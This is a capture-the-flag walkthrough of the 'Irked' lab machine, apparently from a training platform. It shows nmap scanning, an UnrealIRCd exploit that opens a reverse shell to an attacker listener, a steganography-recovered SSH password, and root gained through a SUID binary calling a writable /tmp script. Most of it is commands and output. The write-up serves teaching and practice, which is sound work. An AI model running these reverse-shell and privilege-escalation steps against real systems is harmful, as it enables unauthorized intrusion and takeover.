Irked

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.117 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Sun Jan  9 21:56:37 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.117
Warning: 10.10.10.117 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.117
Host is up (0.071s latency).
Not shown: 60717 closed tcp ports (reset), 4811 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
38366/tcp open  unknown
65534/tcp open  unknown

# Nmap done at Sun Jan  9 21:57:02 2022 -- 1 IP address (1 host up) scanned in 25.49 seconds

As we see, a few ports are open.

Let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,111,6697,8067,38336,65534 10.10.10.143 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Sun Jan  9 22:17:17 2022 as: nmap -Pn -sCV -p22,80,111,6697,8067,38336,65534 -oN targeted 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.059s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38366/tcp   status
|   100024  1          44984/udp6  status
|   100024  1          53486/tcp6  status
|_  100024  1          53490/udp   status
6697/tcp  open   irc     UnrealIRCd
8067/tcp  open   irc     UnrealIRCd
38336/tcp closed unknown
65534/tcp open   irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  9 22:17:27 2022 -- 1 IP address (1 host up) scanned in 10.13 seconds

Exploitation

There is an IRC server. If you search for UnrealIRCd exploits on Google. You'll find an exploit coded in python which sends back to a listener a reverse shell. Before executing the exploit, let's set a netcat listener on port 4444.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Then, we'll have to edit the exploit and add our IP address, and the port in which netcat will be listening.

# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.19'  # CHANGE THIS
local_port = '4444'  # CHANGE THIS 

Then all we have to do is execute the script with python, and we'll get a shell as the ircd user, but we won't be able to see the user flag yet.

python3 exploit.py -payload python 10.10.10.117 6697

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.117] 53010
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd

Privilege Escalation

If we take a look at the home directory, we'll see that we can list the djmardov home directory. And we see that there is a .backup file in the user's desktop.

ls -la /home/djmardov/Documents/

total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3  2018 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

If we see what's inside, we'll see a password and a message saying that the password is for steg (Steganography).

cat /home/djmardov/Documents/.backup

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

If you noticed at the nmap scan, there is a website which has an image. Maybe that image has a secret message hide in it.

Let's download the image and use steghide.

steghide extract -sf irked.jpg

• -sf select steg file.

Anotar salvoconducto: UPupDOWNdownLRlrBAbaSSss
anot los datos extrados e/"pass.txt".

And we get a password.

cat pass.txt

Kab6h+m+bbp2J:HG

The machine also has an SSH service, let's try to log in as the user djmardov with the found password. Then we could grab the user flag.

ssh djmardov@10.10.10.117

djmardov@10.10.10.117's password: Kab6h+m+bbp2J:HG

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb  7 14:29:03 2022 from 10.10.14.19
djmardov@irked:~$ whoami
djmardov
djmardov@irked:~$ cat /home/djmardov/Documents/user.txt 
4a66a78b12dc0e661a59d3f5c0267a8e

Let's see if there is any SUID binary we can exploit.

find / -perm /4000 2>/dev/null

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

The /usr/bin/viewuser binary seems a bit odd. Let's execute it.

/usr/bin/viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Feb  7 14:17 (:0)
djmardov pts/1        Feb  7 15:14 (10.10.14.19)
sh: 1: /tmp/listusers: not found

The binary is trying to execute a file in the tmp directory, which doesn't exist. We can create that file which will give the /bin/bash binary the SUID permission, so we can have a shell as the root user.

nano /tmp/listusers

chmod +s /bin/bash

chmod +x /tmp/listusers

If we execute the viewuser binary again, it will execute our malicious script and the bash binary will have the SUID permission.

djmardov@irked:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1105840 Nov  5  2016 /bin/bash
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Feb  7 14:17 (:0)
djmardov pts/1        Feb  7 15:14 (10.10.14.19)
djmardov@irked:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1105840 Nov  5  2016 /bin/bash

Finally, if we execute bash with the privileged mode, then all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
8d8e9e8be64654b6dccc3bff4522daf3